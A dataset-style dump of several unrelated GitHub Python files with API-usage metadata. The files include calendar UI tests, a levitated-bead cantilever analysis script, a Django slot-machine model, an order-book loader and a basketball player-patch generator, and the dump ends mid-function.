"api_name": "os.makedirs",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "cv2.imread",
"line_number":... |
16835981819 | import pytest
from backend.utils.assertions import assert_equals, assert_true
from backend.utils.helper import Helper
from front.data_for_tests.calender_data_for_tests import DataForTests
from front.pages.page import CalendarPage, CalendarConfiguration
@pytest.mark.usefixtures("setup", "test_config")
class TestCalender:
    """UI tests for the calendar's infinite-scroll + month-view behaviour."""

    @pytest.fixture(scope="class")
    def calendar_page(self, setup, test_config):
        # `setup` yields the webdriver; open the calendar URL from the config.
        driver = setup
        calendar_page = CalendarPage(driver)
        calendar_page.open_url(Helper.get_config_value_by_name(test_config, ["calender", "url"]))
        return calendar_page

    @pytest.fixture(scope="class")
    def switch_to_infinite_scroll_and_month_view(self, setup, calendar_page):
        # Shared precondition: enable infinite scroll and switch to Month view.
        driver = setup
        calendar_config = CalendarConfiguration(driver)
        calendar_config.enable_infinite_scroll()
        calendar_page.switch_view("Month")

    @pytest.mark.parametrize("test_data", DataForTests.switch_to_infinite_scroll_and_month_view())
    def test_switch_to_infinite_scroll_and_month_view(self, setup, test_data, calendar_page,
                                                      switch_to_infinite_scroll_and_month_view):
        # Verify configuration and view match the expected parametrized data.
        driver = setup
        calendar_config = CalendarConfiguration(driver)
        calendar_configuration = calendar_config.get_calendar_configuration()
        assert_equals(calendar_configuration, test_data["configuration"])
        calendar_page.verify_requested_view_checked(test_data["view_type"])

    def test_create_events_check_element_count_increased(self, calendar_page,
                                                         switch_to_infinite_scroll_and_month_view):
        # Create two events; each must be present in the DOM afterwards.
        event_resource_id = calendar_page.create_event()
        assert_true(calendar_page.verify_event_was_created(event_resource_id),
                    "Error: After creating an event, Event not found!")
        event_resource_id = calendar_page.create_event()
        assert_true(calendar_page.verify_event_was_created(event_resource_id),
                    "Error: After creating an event, Event not found!")

    def test_create_event_and_go_ahead_one_month_and_check_dom_decrease(self, setup, calendar_page,
                                                                        switch_to_infinite_scroll_and_month_view):
        # Navigating one month forward should unload the event from the DOM.
        event_resource_id = calendar_page.create_event()
        calendar_page.navigation_forward(1)
        assert_true(not calendar_page.verify_event_was_created(event_resource_id),
                    "Error: After creating an event and going one month forward, Event found!")

    @pytest.mark.skip("This test have bug, so it will failed")
    def test_create_event_change_month_and_check_event_still_exist(self, setup, calendar_page,
                                                                   switch_to_infinite_scroll_and_month_view):
        # Known-failing: the event should re-appear after navigating back.
        event_resource_id = calendar_page.create_event()
        calendar_page.navigation_forward(1)
        assert_true(not calendar_page.verify_event_was_created(event_resource_id),
                    "Error: After creating an event and going one month forward, Event found!")
        calendar_page.navigation_backward(1)
        assert_true(calendar_page.verify_event_was_created(event_resource_id),
                    "Error: After creating an event, change month and go back.Event not found!")
{
"api_name": "front.pages.page.CalendarPage",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "backend.utils.helper.Helper.get_config_value_by_name",
"line_number": 16,
"usage_type": "call"
},
{
"api_name": "backend.utils.helper.Helper",
"line_number": 16,
"usag... |
42243061570 | import cant_utils as cu
import numpy as np
import matplotlib.pyplot as plt
import glob
import bead_util as bu
import tkinter
import tkinter.filedialog
import os, sys
from scipy.optimize import curve_fit
import bead_util as bu
from scipy.optimize import minimize_scalar as minimize
import pickle as pickle
import time
####################################################
####### Input parameters for data processing #######
TESTING = True
ddict = bu.load_dir_file( "/home/charles/opt_lev_analysis/scripts/dirfiles/dir_file_june2017.txt" )
#print ddict
pow_axis = 4
cant_axis = 1 # stage control axis
straighten_axis = 2 # axis with coherent drive to straighten
fit_pows = True
load_charge_cal = True
maxfiles = 1000
plot_forward_backward = False #True
#subtract_background = True
drivefreq = 18.0
cant_volts_to_um = 8.0 # 80 um / 10 V
#fig_title = ('Force vs. Cantilever Position: %s Hz, %s - %s, ' + bead) % (drivefreq, gas, num)
#dirs = [1,2,3,4,5,6,7]
dirs = [8,9,10,11,12,13,14,15,16]
tf_path = './trans_funcs/Hout_20160808.p'
step_cal_path = './calibrations/step_cal_20160808.p'
thermal_cal_file_path = '/data/20160808/bead1/1_5mbar_zcool_final.h5'
def poly2(x, a, b, c):
    """Quadratic model in vertex form, a*(x - b)**2 + c, for curve_fit.

    Works elementwise on numpy arrays as well as on scalars.
    """
    offset = x - b
    return a * offset ** 2 + c
def proc_dir(d):
    """Load one data directory and record its single drive amplitude.

    Looks up directory *d* in the global ``ddict``, loads its files
    (capped at ``maxfiles``), extracts the stage drive amplitude along
    ``straighten_axis`` from each file, and stores it on the returned
    ``Data_dir`` as a 3-vector with zeros on the other axes.
    """
    dv = ddict[d]
    dir_obj = cu.Data_dir(dv[0], [0,0,dv[-1]], dv[1])
    dir_obj.load_dir(cu.simple_loader, maxfiles = maxfiles)
    amps = []
    for fil_obj in dir_obj.fobjs:
        fil_obj.psd()
        stagestuff = fil_obj.get_stage_settings(axis=straighten_axis)
        # stage setting is in volts; convert to microns
        amp = stagestuff[2] * cant_volts_to_um
        amps.append(amp)
    uamps = np.unique(amps)
    if len(uamps) > 1:
        # all files in one directory are expected to share one amplitude
        print('STUPIDITYERROR: Multiple dirve amplitudes in directory')
    newlist = []
    for i in [0,1,2]:
        if i == straighten_axis:
            newlist.append(uamps[0])
        else:
            newlist.append(0.0)
    dir_obj.drive_amplitude = newlist
    return dir_obj
dir_objs = list(map(proc_dir, dirs))
colors_yeay = bu.get_color_map( len(dir_objs) )
psds = {}
pows = {}
bpows = {}
for ind, obj in enumerate(dir_objs):
psd = []
col = colors_yeay[ind]
amp = obj.drive_amplitude[straighten_axis]
filcount = 0
for fobj in obj.fobjs:
filcount += 1
fobj.psd()
if not len(psd):
freqs = fobj.other_psd_freqs
psd = fobj.other_psds[pow_axis-3]
else:
psd += fobj.other_psds[pow_axis-3]
psd = psd / float(filcount)
psds[amp] = psd
ind = np.argmin(np.abs(freqs - drivefreq))
totpow = np.sum(psd[ind-1:ind+2])
pows[amp] = totpow
badind = int(ind*1.5)
totbadpow = np.sum(psd[badind-1:badind+2])
bpows[amp] = totbadpow
amps = list(pows.keys())
amps.sort()
powsarr = []
bpowsarr = []
for amp in amps:
powsarr.append(pows[amp])
bpowsarr.append(bpows[amp])
if fit_pows:
p0 = [1, 0, 0]
popt, pcov = curve_fit(poly2, amps, powsarr, p0 = p0, maxfev = 10000)
fitpoints = np.linspace(amps[0], amps[-1], 100)
fit = poly2(fitpoints, *popt)
plt.plot(amps, powsarr, 'o')
plt.plot(fitpoints, fit, color='r', linewidth=1.5)
title = 'Best fit straightening amplitude: %0.2g um' % popt[1]
plt.title(title)
else:
plt.plot(amps, powsarr)
plt.plot(amps, bpowsarr)
plt.show()
| charlesblakemore/opt_lev_analysis | scripts/general_analysis/not_yet_updated/straighten_cantilever_withpower.py | straighten_cantilever_withpower.py | py | 3,333 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "bead_util.load_dir_file",
"line_number": 20,
"usage_type": "call"
},
{
"api_name": "cant_utils.Data_dir",
"line_number": 62,
"usage_type": "call"
},
{
"api_name": "cant_utils.simple_loader",
"line_number": 63,
"usage_type": "attribute"
},
{
"api_nam... |
20760678532 | from re import T
from django.db import models
from machine.computations.examples import victorious_payment
from django.contrib.postgres.fields import ArrayField
# Create your models here.
class Machine(models.Model):
    """Database model for a slot machine: reels, payout table and ROI tracking."""

    def empty_list():
        # Default factory for the ArrayFields below (fresh list per row,
        # avoiding a shared mutable default).
        return list()

    # Identify which machine is in use (was: "identificar la maquina que estamos usando").
    name = models.CharField(max_length=200, blank=True)
    # Payout table; schema defined by machine.computations — TODO confirm.
    payments = models.JSONField()
    free_spins = ArrayField(
        models.IntegerField(blank=True),
        size=5,
        default=empty_list
    )
    normal_reel = ArrayField(
        models.CharField(max_length=200, blank=True),
        size=5,
        default=empty_list
    )
    bonus_reel = ArrayField(
        models.CharField(max_length=200, blank=True),
        size=5,
        default=empty_list
    )
    visible = ArrayField(
        models.IntegerField(blank=True),
        size=5,
        default=empty_list
    )
    multiplier = models.IntegerField(default=3)

    # TODO: revisit roi tracking (original notes: "corregir" / "ver si se puede mejorar").
    roi = models.FloatField(default=0)

    def payment(self, roll):
        # Delegate payout computation for *roll* to the rules module.
        return victorious_payment(self, roll)

    def save(self, *args, **kwargs):
        # NOTE(review): roi grows by 0.01 on *every* save, not only on spins —
        # confirm this is intentional.
        self.roi += 0.01
        super(Machine, self).save(*args, **kwargs)

    def __str__(self) -> str:
        return self.name
| montenegrop/casinoGames | machine/models.py | models.py | py | 1,286 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "django.db.models.Model",
"line_number": 10,
"usage_type": "attribute"
},
{
"api_name": "django.db.models",
"line_number": 10,
"usage_type": "name"
},
{
"api_name": "django.db.models.CharField",
"line_number": 15,
"usage_type": "call"
},
{
"api_name"... |
# Import libraries
import pandas as pd
import json

# Load the raw order-book snapshot captured on 2021-07-05.  A context
# manager ensures the file handle is closed (the original left it open
# for the lifetime of the process).
with open('orderbooks_05jul21.json') as f:
    print(f)
    # Returns JSON object as a dictionary
    orderbooks_data = json.load(f)

ob_data = orderbooks_data['bitfinex']

# Drop keys whose order book is missing (None)
ob_data = {i_key: i_value for i_key, i_value in ob_data.items() if i_value is not None}

# Convert each order book to a DataFrame and rearrange the columns.
# The `is not None` guard is redundant after the filter above, but kept
# for safety against callers mutating ob_data.
ob_data = {i_ob: pd.DataFrame(ob_data[i_ob])[['bid_size', 'bid', 'ask', 'ask_size']]
           if ob_data[i_ob] is not None else None for i_ob in list(ob_data.keys())}
| if722399/Laboratorio-1-MySt- | dataa.py | dataa.py | py | 578 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "json.load",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "pandas.DataFrame",
"line_number": 17,
"usage_type": "call"
}
] |
18200360642 | import json
import os
import random
import shutil
from predictor import get_predictor
from yolox.tracking_utils.timer import Timer
import cv2
import numpy as np
def get_gt_by_frame(bbox_file: str):
    """Load a ground-truth annotation file and group player boxes by frame.

    The annotation maps each labelled player to per-frame boxes; the real
    frame index is recovered from the image URL (``..._<idx>.jpg``).

    Returns:
        dict: frame_idx -> (ndarray of shape (N, 5) boxes with a trailing
        confidence of 1, ndarray of shape (N,) player indices)
    """
    with open(bbox_file) as fp:
        annotation = json.load(fp)

    players = annotation['labels']
    # Map the annotation's internal frame ordinal to the real frame index
    # encoded in the image file name.
    frame_lookup = [int(url.split('_')[-1].split('.')[0])
                    for url in annotation['info']['url']]

    grouped = {}
    for player_idx, player in enumerate(players):
        for entry in player['data']['frames']:
            real_idx = frame_lookup[entry['frame']]
            boxes, ids = grouped.setdefault(real_idx, ([], []))
            boxes.append(entry['points'] + [1])
            ids.append(player_idx)

    return {idx: (np.array(boxes), np.array(ids))
            for idx, (boxes, ids) in grouped.items()}
def ensure_folder(path: str):
    """Create *path* (including parents) if it does not already exist.

    Replaces the original bare ``try/except: pass``, which silently
    swallowed *every* error (permissions, bad paths, even
    KeyboardInterrupt) instead of only "already exists".
    """
    os.makedirs(path, exist_ok=True)
def remove_folder(path: str):
    """Delete the directory tree at *path*; a missing path is ignored.

    Narrows the original bare ``except`` (which also hid permission
    errors and KeyboardInterrupt) to rmtree's own ignore-errors
    semantics.
    """
    shutil.rmtree(path, ignore_errors=True)
if __name__ == '__main__':
gt_labels = os.listdir('./input/bboxes')
detector = get_predictor()
OUTPUT_ROOT = './output'
remove_folder(OUTPUT_ROOT)
ensure_folder(OUTPUT_ROOT)
splits = ['train', 'val', 'test']
for split in splits:
ensure_folder(OUTPUT_ROOT + f'/{split}/negative')
ensure_folder(OUTPUT_ROOT + f'/{split}/positive')
for gt_label_file in gt_labels:
gt_bboxes = get_gt_by_frame(f'./input/bboxes/{gt_label_file}')
video_id = gt_label_file.split('.')[0]
print(video_id)
if not os.path.exists(f'./input/images/{video_id}'):
continue
# extract positive patches
for frame_idx, (player_bboxes, player_ids) in gt_bboxes.items():
img = cv2.imread(f'./input/images/{video_id}/{frame_idx}.jpg')
img_masked = img.copy()
for bbox in player_bboxes:
x1, y1, x2, y2, _ = bbox.astype(int)
img_masked[y1:y2, x1:x2] = 0
cv2.imwrite(OUTPUT_ROOT + '/masked.png', img_masked)
outputs, img_info = detector.inference(img_masked[:, :, :3], Timer())
output_results = outputs[0]
if output_results is None: break
imgH, imgW = img_info['height'], img_info['width']
# human_bboxes = []
output_results = output_results.cpu().numpy()
scores = output_results[:, 4] * output_results[:, 5]
human_bboxes = output_results[:, :4] # x1y1x2y2
remain_indx = scores > 0.6
scores = scores[remain_indx]
human_bboxes = human_bboxes[remain_indx]
img_size = (800, 1440)
scale = min(img_size[0] / float(imgH), img_size[1] / float(imgW))
human_bboxes /= scale
# negative samples
negative_samples = [(bIdx, b) for bIdx, b in enumerate(human_bboxes) if b.min() > 0]
negative_samples = random.sample(negative_samples, min(20, len(negative_samples)))
random.shuffle(negative_samples)
train_split_idx = int(len(negative_samples) * 0.7)
val_split_idx = int(len(negative_samples) * 0.8)
for idx, (bIdx, bbox) in enumerate(negative_samples):
split = 'train' if idx < train_split_idx else ('val' if idx < val_split_idx else 'test')
x1, y1, x2, y2 = bbox.astype(int)
cv2.imwrite(f'{OUTPUT_ROOT}/{split}/negative/{video_id}_{frame_idx}_{bIdx}.png', img[y1:y2, x1:x2])
positive_samples = list(zip(player_ids, player_bboxes))
random.shuffle(positive_samples)
train_split_idx = int(len(positive_samples) * 0.7)
val_split_idx = int(len(positive_samples) * 0.8)
for idx, (player_id, player_bboxe) in enumerate(positive_samples):
split = 'train' if idx < train_split_idx else ('val' if idx < val_split_idx else 'test')
x1, y1, x2, y2, _ = player_bboxe.astype(int)
x1 = max(x1, 0)
try:
cv2.imwrite(f'{OUTPUT_ROOT}/{split}/positive/{video_id}_{frame_idx}_{player_id}.png', img[y1:y2, x1:x2])
except:
print(f'{OUTPUT_ROOT}/{split}/positive/{video_id}_{frame_idx}_{player_id}.png', x1, y1, x2, y2)
| chenzhutian/nba-Player-classifier | generate_samples.py | generate_samples.py | py | 4,488 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "json.load",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "numpy.array",
"line_number": 28,
"usage_type": "call"
},
{
"api_name": "os.makedirs",
"line_number": 34,
"usage_type": "call"
},
{
"api_name": "shutil.rmtree",
"line_number": ... |
22700582787 | import pathlib
import json
import numpy as np
import pandas as pd
from scipy.interpolate import SmoothBivariateSpline, UnivariateSpline
import matplotlib as mpl
import matplotlib.pyplot as plt
from .common import Timer, Tools
from .sim_ctr import RgbGrid
from .sim_reduce import Steps, ReduceModel
class SynthGrid:
    """Synthesize stellar models on a (mass, [Fe/H]) output grid.

    Interpolates reduced quantities from the simulated rgb_grid over the
    mixing-length parameter aMLT, then evaluates each output model at the
    aMLT predicted by the fitted AMLT_MODEL calibration.
    """

    # Fitted aMLT(mass, FeH) calibration file and the key to read from it.
    POPT_PATH = 'rgb_calibr/Salaris-off_vary-both.json'
    AMLT_KEY = 'ms2_mt1'
    # aMLT = a + b1*(M-1) + b2*(M-1)^2 + c1*FeH, with x = [mass - 1, FeH].
    AMLT_MODEL = lambda x, a, b1, b2, c1: a + b1*x[0] + b2*x[0]**2 + c1*x[1]
    # Grid of output models to synthesize.
    OUT_MASS_LIST = [0.9, 1. , 1.1, 1.2, 1.3, 1.4, 1.5, 1.6, 1.7, 1.8]
    OUT_FEH_LIST = [-0.4, -0.3, -0.2, -0.1, 0. , 0.1, 0.2, 0.3, 0.4]
    # Subset of the grid for which diagnostic plots are produced.
    OUT_MASS_MINI = [1. , 1.4, 1.8]
    OUT_FEH_MINI = [-0.4, 0. , 0.4]

    def __init__(self, aMLT_list: [float], mass_list: [float] = RgbGrid.MASS_LIST,
                 FeH_list: [float] = RgbGrid.FEH_LIST, **kwargs):
        """Set up input/output folders, load the aMLT calibration, and run.

        :param aMLT_list: mixing-length values available in the sim grid
        :param mass_list: stellar masses available in the sim grid
        :param FeH_list: metallicities available in the sim grid
        :param kwargs: forwarded to RgbGrid.Y_Z_calc (Ybirth, Zbirth,
            Z_over_X_sun, YBBN)
        """
        self.indir = pathlib.Path('rgb_grid')
        assert self.indir.exists(), 'rgb_grid does not exist'
        self.outdir = pathlib.Path('synth_grid')
        self.outdir.mkdir(exist_ok=True)
        popt_path = pathlib.Path(SynthGrid.POPT_PATH)
        assert popt_path.exists(), 'popt_path does not exist'
        with open(popt_path, 'r') as f:
            popt_dict = json.load(f)
        self.aMLT_popt = popt_dict[SynthGrid.AMLT_KEY]
        self.aMLT_list = aMLT_list
        self.mass_list = mass_list
        self.FeH_list = FeH_list
        self.kwargs = kwargs  # Ybirth, Zbirth, Z_over_X_sun, YBBN
        self.timer = Timer()
        # The whole synthesis pipeline runs directly from the constructor.
        self()
    def __call__(self):
        """Full pipeline: extract sim data, build interpolators, synthesize grid."""
        self.extract_sim_data()
        self.build_interps()
        for mass in SynthGrid.OUT_MASS_LIST:
            for FeH in SynthGrid.OUT_FEH_LIST:
                # Evaluate the fitted aMLT(mass, FeH) calibration for this model.
                aMLT_fit = SynthGrid.AMLT_MODEL([mass-1, FeH], *self.aMLT_popt)
                self.synthesize_model(mass, FeH, aMLT_fit)
        self.clear()
        print(' > All models synthesized!', '@', self.timer(), flush=True)
    def extract_sim_data(self):
        """Load every simulated model's reduced data into 4-D arrays.

        Array axes: (aMLT, evolutionary step, mass, FeH).  Models that do
        not exist on disk are flagged False in self.existence and their
        entries left at zero.
        """
        shape = (len(self.aMLT_list), Steps.end+1,
                 len(self.mass_list), len(self.FeH_list))
        self.existence = np.ones(shape[:1] + shape[2:], dtype=bool)
        self.data_dict = {qty: np.zeros(shape) for qty in ReduceModel.QTY_LIST}
        for k, aMLT in enumerate(self.aMLT_list):
            for j, mass in enumerate(self.mass_list):
                for i, FeH in enumerate(self.FeH_list):
                    Y, Z = RgbGrid.Y_Z_calc(FeH, **self.kwargs)
                    model = SynthModel(self, aMLT=aMLT, mass=mass, Z=Z, FeH=FeH)
                    if model.exists:
                        for qty in ReduceModel.QTY_LIST:
                            self.data_dict[qty][k, :, j, i] = model.data[qty]
                    else:
                        self.existence[k, j, i] = False
                    # Free per-model buffers early; the grid can be large.
                    model.clear_data(); del model
    def build_interps(self):
        """Build a (mass, FeH) -> quantity spline per aMLT and per step.

        Only grid points where the simulation exists feed each
        SmoothBivariateSpline (degree 2 in both variables).
        """
        self.interp_dict = {}
        for qty in ReduceModel.QTY_LIST:
            self.interp_dict[qty] = [[None for step in range(Steps.end+1)]
                                     for aMLT in self.aMLT_list]
            for k in range(len(self.aMLT_list)):
                for step in range(Steps.end+1):
                    self.interp_dict[qty][k][step] = SmoothBivariateSpline(
                        self.data_dict['star_mass'][k, step][self.existence[k]],
                        self.data_dict['surface_[Fe/H]'][k, step][self.existence[k]],
                        self.data_dict[qty][k, step][self.existence[k]], kx=2, ky=2)
def synthesize_model(self, mass: float, FeH: float, aMLT_fit: float):
    """Synthesize one track at (mass, FeH): evaluate each per-aMLT spline
    at (mass, FeH), interpolate linearly across aMLT to the fitted
    mixing-length value, and write the result to CSV."""
    # Y is unused; Z only enters the output file name.
    Y, Z = RgbGrid.Y_Z_calc(FeH, **self.kwargs)
    model_name = f'{mass:.2f}M_Z={Z:.4f}_FeH={FeH:+.2f}'
    print(' > Synthesizing', model_name, '@', self.timer())
    pred = {}; data = {}
    for qty in ReduceModel.QTY_LIST:
        # pred: one row per aMLT grid value; data: the aMLT-interpolated track.
        pred[qty] = np.zeros((len(self.aMLT_list), Steps.end+1))
        data[qty] = np.zeros(Steps.end+1)
    for qty in ReduceModel.QTY_LIST:
        for step in range(Steps.end+1):
            for k, aMLT in enumerate(self.aMLT_list):
                # Spline evaluation returns a 1x1 array; take the scalar.
                pred[qty][k, step] = self.interp_dict[qty][k][step](mass, FeH)[0, 0]
            # Linear (k=1) interpolation across the aMLT axis.
            data[qty][step] = UnivariateSpline(self.aMLT_list, pred[qty][:, step], k=1)(aMLT_fit)
    # Diagnostic figures only for the small "mini" subset of output models.
    if mass in SynthGrid.OUT_MASS_MINI and FeH in SynthGrid.OUT_FEH_MINI:
        self._visualize_data(model_name, pred, data, aMLT_fit)
    df = pd.DataFrame(data)
    df.to_csv(self.outdir / f'{model_name}.csv')
    pred.clear(); data.clear()
    del df, pred, data
def _draw_curve(self, pred, data, ax, x, y, colors):
    """Plot quantity *y* against *x* on *ax*: one dashed track per aMLT,
    the solid aMLT-interpolated track, grey iso-step connectors, and
    colored markers at named evolutionary points."""
    for k, aMLT in enumerate(self.aMLT_list):
        ax.plot(pred[x][k], pred[y][k], '--', c=colors[k])
    # colors[-1] is reserved for the fitted-aMLT (interpolated) track.
    ax.plot(data[x], data[y], '-', c=colors[-1])
    # Convention: temperature/gravity axes increase leftward/downward.
    if x in ['Teff', 'log_g']: ax.invert_xaxis()
    if y in ['Teff', 'log_g']: ax.invert_yaxis()
    # Thin grey lines connect the same evolution step across aMLT values.
    for step in range(Steps.end+1):
        ax.plot([pred[x][k, step] for k in range(len(self.aMLT_list))],
                [pred[y][k, step] for k in range(len(self.aMLT_list))],
                ls='-', lw=0.5, c='lightgrey', zorder=-1)
    # Highlight named evolutionary phases with per-phase colors
    # (falling back to 'tab:cyan' when Steps defines no color attribute).
    for EEP in ['mid_PMS', 'ZAMS', 'mid_MS', 'TAMS', 'mid_SGB',
                'pre_FDU', 'post_FDU', 'pre_RGBB', 'post_RGBB']:
        idx = getattr(Steps, EEP)
        color = getattr(Steps, f'{EEP}_c', 'tab:cyan')
        ax.plot([pred[x][k, idx] for k in range(len(self.aMLT_list))],
                [pred[y][k, idx] for k in range(len(self.aMLT_list))],
                ls='-', lw=0.5, c=color, zorder=-1)
        ax.plot(data[x][idx], data[y][idx], 'o', c=color, ms=4)
    ax.set_xlabel(x)
    ax.set_ylabel(y)
    Tools.format_axis(ax)
def _visualize_data(self, model_name, pred, data, aMLT_fit):
    """Diagnostic plots for one synthesized model: HR-style tracks,
    age/model-number coordinate panels, and one history panel per
    remaining quantity, merged into a single output."""
    # Color tracks by aMLT; the extra final color marks the fitted value.
    cmap = mpl.colormaps['summer_r']
    norm = mpl.colors.Normalize(vmin=self.aMLT_list[0],
                                vmax=self.aMLT_list[-1])
    colors = [cmap(norm(a)) for a in self.aMLT_list + [aMLT_fit]]
    # draw evolutionary tracks
    fig, axs = plt.subplots(1, 2)
    self._draw_curve(pred, data, axs[0], 'Teff', 'log_L', colors)
    self._draw_curve(pred, data, axs[1], 'Teff', 'log_g', colors)
    for i in range(2):
        fig.colorbar(mpl.cm.ScalarMappable(norm=norm, cmap=cmap),
                     ax=axs[i], orientation='horizontal', label=r'mixing length $\alpha$')
    Tools.save_figure(fig, 'tracks')
    # draw coordinates
    fig, axs = plt.subplots(2, 1)
    self._draw_curve(pred, data, axs[0], 'star_age', 'model_number', colors)
    self._draw_curve(pred, data, axs[1], 'model_number', 'star_age', colors)
    for i in range(2):
        fig.colorbar(mpl.cm.ScalarMappable(norm=norm, cmap=cmap),
                     ax=axs[i], orientation='vertical', label=r'ML $\alpha$')
    Tools.save_figure(fig, 'coords')
    # draw histories
    # NOTE(review): QTY_LIST[2:] presumably skips star_age/model_number,
    # which were plotted above -- confirm ordering of QTY_LIST.
    for qty in ReduceModel.QTY_LIST[2:]:
        fig, axs = plt.subplots(2, 1)
        self._draw_curve(pred, data, axs[0], 'star_age', qty, colors)
        self._draw_curve(pred, data, axs[1], 'model_number', qty, colors)
        for i in range(2):
            fig.colorbar(mpl.cm.ScalarMappable(norm=norm, cmap=cmap),
                         ax=axs[i], orientation='vertical', label=r'ML $\alpha$')
        # '/' in quantity names (e.g. surface_[Fe/H]) is not path-safe.
        Tools.save_figure(fig, qty.replace('/', '_'))
    Tools.merge_plots(self.outdir, model_name, ['tracks', 'coords'] \
        + [qty.replace('/', '_') for qty in ReduceModel.QTY_LIST[2:]])
def clear(self):
    """Release all cached grid data and fitted interpolators."""
    n_aMLT = len(self.aMLT_list)
    for quantity in ReduceModel.QTY_LIST:
        # Empty each per-aMLT list of splines before dropping the outer list.
        for idx in range(n_aMLT):
            self.interp_dict[quantity][idx].clear()
        self.interp_dict[quantity].clear()
    self.data_dict.clear()
    self.interp_dict.clear()
    del self.existence, self.data_dict, self.interp_dict
class SynthModel:
    """A single raw simulation model loaded from the grid input directory."""

    def __init__(self, grid: SynthGrid, **kwargs) -> None:
        """Locate and (if present) load the CSV for the model described by
        kwargs (aMLT, mass, Z, FeH); `self.exists` records availability."""
        self.grid = grid
        self.model_name = f'aMLT={kwargs["aMLT"]:.4f}_{kwargs["mass"]:.2f}M_' \
                          f'Z={kwargs["Z"]:.4f}_FeH={kwargs["FeH"]:+.2f}'
        fpath = grid.indir / f'{self.model_name}.csv'
        self.exists = fpath.exists()
        if not self.exists:
            # Missing models are tolerated; the caller marks them absent.
            print(f' > Warning: {self.model_name} does not exist.')
            return
        self.data = pd.read_csv(fpath, index_col=0)

    def clear_data(self):
        """Drop the loaded DataFrame to free memory (no-op if never loaded)."""
        if self.exists:
            del self.data
| kailicao/mesa_apokasc | sim_synth.py | sim_synth.py | py | 8,766 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "sim_ctr.RgbGrid.MASS_LIST",
"line_number": 26,
"usage_type": "attribute"
},
{
"api_name": "sim_ctr.RgbGrid",
"line_number": 26,
"usage_type": "name"
},
{
"api_name": "sim_ctr.RgbGrid.FEH_LIST",
"line_number": 27,
"usage_type": "attribute"
},
{
"api_... |
496184917 | # -*- coding: utf-8 -*-
import time
import click
from click.testing import CliRunner
from dagster_aws.cli.term import Spinner, Term
def test_term():
    """Each Term.* helper prints its prefix + message; fatal() also exits 1."""
    def term_helper(term_cmd, prefix, exit_code=0):
        # Wrap the Term call in a throwaway click command so CliRunner
        # can capture its output and exit code.
        @click.command()
        def fn():
            term_cmd('foo bar')
        runner = CliRunner()
        result = runner.invoke(fn)
        assert result.exit_code == exit_code
        assert result.output == prefix + u'foo bar\n'
    expected = [
        (Term.error, Term.ERROR_PREFIX),
        (Term.info, Term.INFO_PREFIX),
        (Term.success, Term.SUCCESS_PREFIX),
        (Term.waiting, Term.WAITING_PREFIX),
        (Term.warning, Term.WARNING_PREFIX),
    ]
    for term_cmd, prefix in expected:
        term_helper(term_cmd, prefix)
    # fatal() is special: it aborts the command with exit code 1.
    term_helper(Term.fatal, Term.FATAL_PREFIX, exit_code=1)
def test_spinner(capsys):
    """The Spinner context manager writes braille animation frames, each
    followed by a backspace, to stdout while the body runs."""
    with Spinner():
        time.sleep(0.5)
    captured = capsys.readouterr()
    # Unicode-escape makes the expected byte pattern readable: braille
    # frame characters (U+280B, U+2819, ...) interleaved with \x08.
    assert captured.out.encode('unicode-escape').startswith(
        b'\\u280b\\x08\\u2819\\x08\\u2839\\x08\\u2838\\x08'
    )
| helloworld/continuous-dagster | deploy/dagster_modules/libraries/dagster-aws/dagster_aws_tests/cli_tests/test_term.py | test_term.py | py | 1,054 | python | en | code | 2 | github-code | 36 | [
{
"api_name": "click.command",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "click.testing.CliRunner",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "dagster_aws.cli.term.Term.error",
"line_number": 21,
"usage_type": "attribute"
},
{
"api_na... |
32782552053 | import logging
import cabby
from events.stix import parse_stix_package, STIXPackage
def collect_indicator_packages(configuration: dict) -> STIXPackage:
    """Yield STIX packages from every TAXII repository in *configuration*.

    NOTE(review): this is a generator, so the STIXPackage annotation
    describes the yielded items rather than the return value.
    """
    for repository in configuration['repositories']:
        yield from poll_repository(repository)
def poll_repository(repository: dict) -> list:
    """Yield STIX packages from all non-excluded collections of one repository.

    *repository* must provide 'name' and cabby client kwargs under 'client';
    collection names listed under the optional 'exclusions' key are skipped.
    """
    logging.debug("Connecting to %s", repository['name'])
    client = cabby.create_client(**repository['client'])
    collections = (c for c in client.get_collections()
                   if c.name not in repository.get('exclusions', ()))
    for collection in collections:
        yield from poll_collection(client, collection.name)
    logging.info("Repository %s exhausted", repository['name'])
def poll_collection(client: cabby.Client11, collection_name: str) -> list:
    """Poll one TAXII collection, yielding each parseable STIX package and
    logging package/indicator counts when the collection is exhausted."""
    packages = 0
    indicators = 0
    logging.debug("Polling from collection %s", collection_name)
    for block in client.poll(collection_name=collection_name):
        # Blocks that fail to parse yield None and are skipped.
        package = parse_stix_package(block.content)
        if package is not None:
            packages += 1
            indicators += len(package.indicators)
            yield package
    logging.info("Collection %s: Packages %d - IOCs %d",
                 collection_name, packages, indicators)
| noxdafox/iocep | events/taxii.py | taxii.py | py | 1,252 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "events.stix.STIXPackage",
"line_number": 8,
"usage_type": "name"
},
{
"api_name": "logging.debug",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "cabby.create_client",
"line_number": 16,
"usage_type": "call"
},
{
"api_name": "logging.info... |
21518376045 | from __future__ import division
import scipy.optimize
import numpy as np
import json
import re
import cv2
_BLACK = (0, 0, 0)
_RED = (0, 0, 255)
_BLUE = (255, 0, 0)
_PURPLE = (204, 0, 153)
_ORANGE = (51, 153, 255)
_LBROWN = (0, 153, 230)
keypoint_colors = { '1': _RED, '2': _RED, '3': _RED, '4': _RED, '5': _RED,
'6': _ORANGE, '7': _ORANGE, '8': _ORANGE, '9': _ORANGE,
'10': _LBROWN, '11': _LBROWN, '12': _LBROWN, '13': _LBROWN,
'14': _BLUE, '15': _BLUE, '16': _BLUE, '17': _BLUE,
'18': _PURPLE, '19': _PURPLE, '20': _PURPLE, '21': _PURPLE
}
def bbox_iou(boxA, boxB):
    """Intersection-over-union of two [x1, y1, x2, y2] boxes.

    Returns -1.0 (a sentinel, not an IoU) when the boxes do not overlap.
    Coordinates are treated as inclusive pixel indices, hence the +1 terms.
